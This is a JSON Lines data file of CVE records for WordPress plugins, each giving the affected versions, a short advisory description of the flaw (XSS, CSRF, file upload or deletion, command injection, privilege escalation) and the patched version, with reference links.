{"CVE_ID":"CVE-2024-0434","slug":"tour-booking-manager","versionImpact":"1.7.1","versionEndExcluding":"1.7.2","description":"The WordPress Tour & Travel Booking Plugin for WooCommerce \u2013 WpTravelly plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ttbm_new_place_save' function in all versions up to, and including, 1.7.1. This makes it possible for unauthenticated attackers to create and publish new place posts. This function is also vulnerable to CSRF.","recommendation":"Update to version 1.7.2, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84d3e22-8568-4bdb-be9b-ffe78c69ec24?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e84d3e22-8568-4bdb-be9b-ffe78c69ec24?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tour-booking-manager\\\/trunk\\\/admin\\\/settings\\\/tour\\\/TTBM_Settings_place_you_see.php#L225\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/tour-booking-manager\\\/trunk\\\/admin\\\/settings\\\/tour\\\/TTBM_Settings_place_you_see.php#L225\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092969%40tour-booking-manager%2Ftrunk&old=3091912%40tour-booking-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3092969%40tour-booking-manager%2Ftrunk&old=3091912%40tour-booking-manager%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4627","slug":"shiftnav-responsive-mobile-menu","versionEndExcluding":"1.7.2","description":"The ShiftNav WordPress plugin before 1.7.2 does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be9e8870-0682-441d-8955-d096d1346bd1\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/be9e8870-0682-441d-8955-d096d1346bd1\",\"refsource\":\"MISC\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2023-5469","slug":"drop-shadow-boxes","versionImpact":"1.7.13","versionEndExcluding":"1.7.14","description":"The Drop Shadow Boxes plugin for WordPress is vulnerable to Stored Cross-Site Scripting via 'dropshadowbox' shortcode in versions up to, and including, 1.7.13 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b3911c-a960-4f28-b289-389b26282741?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/c0b3911c-a960-4f28-b289-389b26282741?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drop-shadow-boxes\\\/tags\\\/1.7.12\\\/dropshadowboxes.php#L319\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/drop-shadow-boxes\\\/tags\\\/1.7.12\\\/dropshadowboxes.php#L319\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2998610\\\/drop-shadow-boxes#file1\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/2998610\\\/drop-shadow-boxes#file1\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4346","slug":"startklar-elmentor-forms-extwidgets","versionImpact":"1.7.13","versionEndExcluding":"1.7.14","description":"The Startklar Elementor Addons plugin for WordPress is vulnerable to arbitrary file deletion in all versions up to, and including, 1.7.13. This is due to the plugin not properly validating the path of an uploaded file prior to deleting it. This makes it possible for unauthenticated attackers to delete arbitrary files, including the wp-config.php file, which can make site takeover and remote code execution possible.","recommendation":"Update to version 1.7.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a125bbf1-8ff6-4f3d-a4fb-caaaefe1df2a?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a125bbf1-8ff6-4f3d-a4fb-caaaefe1df2a?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/startklarDropZoneUploadProcess.php?rev=3061298#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/startklarDropZoneUploadProcess.php?rev=3061298#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081987\\\/startklar-elmentor-forms-extwidgets\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081987\\\/startklar-elmentor-forms-extwidgets\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-4345","slug":"startklar-elmentor-forms-extwidgets","versionImpact":"1.7.13","versionEndExcluding":"1.7.14","description":"The Startklar Elementor Addons plugin for WordPress is vulnerable to arbitrary file uploads due to insufficient file type validation in the 'process' function in the 'startklarDropZoneUploadProcess' class in versions up to, and including, 1.7.13. This makes it possible for unauthenticated attackers to upload arbitrary files on the affected site's server which may make remote code execution possible.","recommendation":"Update to version 1.7.14, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4221b33c-5cfa-48db-92bf-bf25ff3c5a5f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4221b33c-5cfa-48db-92bf-bf25ff3c5a5f?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/startklarDropZoneUploadProcess.php?rev=3061298#L7\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/startklar-elmentor-forms-extwidgets\\\/trunk\\\/startklarDropZoneUploadProcess.php?rev=3061298#L7\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081987\\\/startklar-elmentor-forms-extwidgets\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3081987\\\/startklar-elmentor-forms-extwidgets\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6486","slug":"imagemagick-engine","versionImpact":"1.7.10","versionEndExcluding":"1.7.11","description":"The ImageMagick Engine WordPress plugin before 1.7.11 for WordPress is vulnerable to OS Command Injection via the \"cli_path\" parameter. This allows authenticated attackers, with administrator-level permission, to execute arbitrary OS commands on the server leading to remote code execution.","recommendation":"Update to version 1.7.11, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a57c0c59-8b5c-4221-a9db-19f141650d9b\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/a57c0c59-8b5c-4221-a9db-19f141650d9b\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-3813","slug":"royal-elementor-addons","versionImpact":"1.7.1020","versionEndExcluding":"1.7.1021","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the \u2018_elementor_data\u2019 parameter in all versions up to, and including, 1.7.1020 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1021, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1021\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php?rev=3301438\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1021\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php?rev=3301438\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php#L24\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php#L24\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php#L75\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/classes\\\/modules\\\/forms\\\/wpr-submissions-cpt.php#L75\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b957eb0d-882d-4646-ad84-9c64f957be14?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/b957eb0d-882d-4646-ad84-9c64f957be14?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-12120","slug":"royal-elementor-addons","versionImpact":"1.7.1017","versionEndExcluding":"1.7.1018","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Countdown widget display_message_text parameter in all versions up to, and including, 1.7.1017 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1018, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236381\\\/royal-elementor-addons\\\/tags\\\/1.7.1008\\\/modules\\\/countdown\\\/widgets\\\/wpr-countdown.php?old=3220755&old_path=royal-elementor-addons%2Ftags%2F1.7.1007%2Fmodules%2Fcountdown%2Fwidgets%2Fwpr-countdown.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3236381\\\/royal-elementor-addons\\\/tags\\\/1.7.1008\\\/modules\\\/countdown\\\/widgets\\\/wpr-countdown.php?old=3220755&old_path=royal-elementor-addons%2Ftags%2F1.7.1007%2Fmodules%2Fcountdown%2Fwidgets%2Fwpr-countdown.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3285549\\\/royal-elementor-addons\\\/tags\\\/1.7.1018\\\/assets\\\/js\\\/frontend.js?old=3277554&old_path=royal-elementor-addons%2Ftags%2F1.7.1017%2Fassets%2Fjs%2Ffrontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3285549\\\/royal-elementor-addons\\\/tags\\\/1.7.1018\\\/assets\\\/js\\\/frontend.js?old=3277554&old_path=royal-elementor-addons%2Ftags%2F1.7.1017%2Fassets%2Fjs%2Ffrontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ee7b4d8-c397-41f6-981f-9a010e4ab2f1?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5ee7b4d8-c397-41f6-981f-9a010e4ab2f1?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1456","slug":"royal-elementor-addons","versionImpact":"1.7.1012","versionEndExcluding":"1.7.1013","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `widgetGrid`, `widgetCountDown`, and `widgetInstagramFeed` methods in all versions up to, and including, 1.7.1012 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1013, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/assets\\\/js\\\/frontend.min.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/assets\\\/js\\\/frontend.min.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262790\\\/royal-elementor-addons\\\/tags\\\/1.7.1013\\\/assets\\\/js\\\/frontend.js?old=3255849&old_path=royal-elementor-addons%2Ftags%2F1.7.1012%2Fassets%2Fjs%2Ffrontend.js\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262790\\\/royal-elementor-addons\\\/tags\\\/1.7.1013\\\/assets\\\/js\\\/frontend.js?old=3255849&old_path=royal-elementor-addons%2Ftags%2F1.7.1012%2Fassets%2Fjs%2Ffrontend.js\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68c6e428-b9cf-442f-a896-a8ceb4b9be0e?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/68c6e428-b9cf-442f-a896-a8ceb4b9be0e?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1455","slug":"royal-elementor-addons","versionImpact":"1.7.1012","versionEndExcluding":"1.7.1013","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Woo Grid widget in all versions up to, and including, 1.7.1012 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1013, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php#L9280\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/trunk\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php#L9280\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262790\\\/royal-elementor-addons\\\/tags\\\/1.7.1013\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php?old=3255849&old_path=royal-elementor-addons%2Ftags%2F1.7.1012%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3262790\\\/royal-elementor-addons\\\/tags\\\/1.7.1013\\\/modules\\\/woo-grid\\\/widgets\\\/wpr-woo-grid.php?old=3255849&old_path=royal-elementor-addons%2Ftags%2F1.7.1012%2Fmodules%2Fwoo-grid%2Fwidgets%2Fwpr-woo-grid.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5666e2b7-acb3-4abb-ac2a-1575206435cf?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/5666e2b7-acb3-4abb-ac2a-1575206435cf?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-1441","slug":"royal-elementor-addons","versionImpact":"1.7.1007","versionEndExcluding":"1.7.1008","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.7.1007. This is due to missing or incorrect nonce validation on the 'wpr_filter_woo_products' function. This makes it possible for unauthenticated attackers to inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.1008, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1007\\\/classes\\\/modules\\\/wpr-filter-woo-products.php#L1895\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1007\\\/classes\\\/modules\\\/wpr-filter-woo-products.php#L1895\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1008\\\/classes\\\/modules\\\/wpr-filter-woo-products.php#L1904\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1008\\\/classes\\\/modules\\\/wpr-filter-woo-products.php#L1904\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bc6a436-6df3-4eaf-a16b-d8b3c3ca7d87?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/6bc6a436-6df3-4eaf-a16b-d8b3c3ca7d87?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10798","slug":"royal-elementor-addons","versionImpact":"1.7.1003","versionEndExcluding":"1.7.1004","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 1.7.1003 via the 'wpr-template' shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created via Elementor that they should not have access to.","recommendation":"Update to version 1.7.1004, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195352\\\/royal-elementor-addons\\\/tags\\\/1.7.1004\\\/admin\\\/includes\\\/wpr-templates-shortcode.php?old=3193132&old_path=royal-elementor-addons%2Ftags%2F1.7.1003%2Fadmin%2Fincludes%2Fwpr-templates-shortcode.php\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset\\\/3195352\\\/royal-elementor-addons\\\/tags\\\/1.7.1004\\\/admin\\\/includes\\\/wpr-templates-shortcode.php?old=3193132&old_path=royal-elementor-addons%2Ftags%2F1.7.1003%2Fadmin%2Fincludes%2Fwpr-templates-shortcode.php\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a7ef5a0-f6c8-41e1-bb3b-119a682be69f?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/4a7ef5a0-f6c8-41e1-bb3b-119a682be69f?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9682","slug":"royal-elementor-addons","versionImpact":"1.7.1001","versionEndExcluding":"1.7.1002","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Form Builder widget in all versions up to, and including, 1.7.1001 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1002, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd90b85e-22a9-4c08-b2cf-4f75406e7ca3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/bd90b85e-22a9-4c08-b2cf-4f75406e7ca3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/assets\\\/js\\\/frontend.js?rev=3184222#L8771\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/assets\\\/js\\\/frontend.js?rev=3184222#L8771\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9668","slug":"royal-elementor-addons","versionImpact":"1.7.1001","versionEndExcluding":"1.7.1002","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's Countdown widget in all versions up to, and including, 1.7.1001 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1002, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8e39f0b-eb4c-4568-9f5a-60a0dc3eb6ba?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/a8e39f0b-eb4c-4568-9f5a-60a0dc3eb6ba?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/modules\\\/countdown\\\/widgets\\\/wpr-countdown.php?rev=3184222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/modules\\\/countdown\\\/widgets\\\/wpr-countdown.php?rev=3184222\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9059","slug":"royal-elementor-addons","versionImpact":"1.7.1001","versionEndExcluding":"1.7.1002","description":"The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Google Maps widget in all versions up to, and including, 1.7.1001 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","recommendation":"Update to version 1.7.1002, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37223d1f-82c8-414f-bf39-63e728541aa3?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/37223d1f-82c8-414f-bf39-63e728541aa3?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/modules\\\/google-maps\\\/widgets\\\/wpr-google-maps.php?rev=3184222\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/royal-elementor-addons\\\/tags\\\/1.7.1002\\\/modules\\\/google-maps\\\/widgets\\\/wpr-google-maps.php?rev=3184222\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-9356","slug":"yotpo-social-reviews-for-woocommerce","versionImpact":"1.7.9","versionEndExcluding":"1.7.10","description":"The Yotpo: Product & Photo Reviews for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'yotpo_user_email' and 'yotpo_user_name' parameters in all versions up to, and including, 1.7.8 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.","recommendation":"Update to version 1.7.10, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f7ddb34-cb5b-4089-bd3e-07056f0b6bd5?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2f7ddb34-cb5b-4089-bd3e-07056f0b6bd5?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotpo-social-reviews-for-woocommerce\\\/trunk\\\/lib\\\/utils\\\/wc-yotpo-settings-functions.php#L100\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/browser\\\/yotpo-social-reviews-for-woocommerce\\\/trunk\\\/lib\\\/utils\\\/wc-yotpo-settings-functions.php#L100\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-10504","slug":"arforms-form-builder","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The Contact Form, Survey, Quiz & Popup Form Builder WordPress plugin before 1.7.1 does not sanitise and escape some parameters when outputting them in the page, which could allow unauthenticated users to perform Cross-Site Scripting attacks.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a22df11-0e24-4248-a8f3-da8f23ccb313\\\/\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/9a22df11-0e24-4248-a8f3-da8f23ccb313\\\/\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2024-6698","slug":"wp-fundraising-donation","versionImpact":"1.7.0","versionEndExcluding":"1.7.1","description":"The FundEngine plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.7.0. This is due to the plugin not properly verifying user meta updated through the update_user_meta function. This makes it possible for authenticated attackers, with subscriber-level access and above, to update their user meta which can be leveraged to update their capabilities to gain administrator access.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec6cf42-291b-452d-ad14-80ae1cd5ec5c?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/2ec6cf42-291b-452d-ad14-80ae1cd5ec5c?source=cve\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3128099%40wp-fundraising-donation%2Ftrunk&old=3072093%40wp-fundraising-donation%2Ftrunk&sfp_email=&sfph_mail=\",\"name\":\"https:\\\/\\\/plugins.trac.wordpress.org\\\/changeset?sfp_email=&sfph_mail=&reponame=&new=3128099%40wp-fundraising-donation%2Ftrunk&old=3072093%40wp-fundraising-donation%2Ftrunk&sfp_email=&sfph_mail=\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2025-2103","slug":"soundrise-music","versionImpact":"1.6.11","versionEndExcluding":"1.7.1","description":"The SoundRise Music plugin for WordPress is vulnerable to unauthorized modification of data that can lead to privilege escalation due to a missing capability check on theironMusic_ajax() function in all versions up to, and including, 1.6.11. This makes it possible for authenticated attackers, with subscriber-level access and above, to update arbitrary options on the WordPress site. This can be leveraged to update the default role for registration to administrator and enable user registration for attackers to gain administrative user access to a vulnerable site.","recommendation":"Update to version 1.7.1, or a newer patched version","refs":"[{\"url\":\"https:\\\/\\\/themeforest.net\\\/item\\\/soundrise-artists-producers-and-record-labels-wordpress-theme\\\/19764337\",\"name\":\"https:\\\/\\\/themeforest.net\\\/item\\\/soundrise-artists-producers-and-record-labels-wordpress-theme\\\/19764337\",\"refsource\":\"\",\"tags\":[]},{\"url\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8c0f9d8-c5cf-4e31-bc0b-289ad7c1d197?source=cve\",\"name\":\"https:\\\/\\\/www.wordfence.com\\\/threat-intel\\\/vulnerabilities\\\/id\\\/e8c0f9d8-c5cf-4e31-bc0b-289ad7c1d197?source=cve\",\"refsource\":\"\",\"tags\":[]}]"}
{"CVE_ID":"CVE-2022-4651","slug":"justified-gallery","versionEndExcluding":"1.7.1","description":"The Justified Gallery WordPress plugin before 1.7.1 does not validate and escape one of its shortcode attributes, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attack.","refs":"[{\"url\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8182075-7472-48c8-8e9d-94b12ab6fcf6\",\"name\":\"https:\\\/\\\/wpscan.com\\\/vulnerability\\\/d8182075-7472-48c8-8e9d-94b12ab6fcf6\",\"refsource\":\"MISC\",\"tags\":[]}]"}
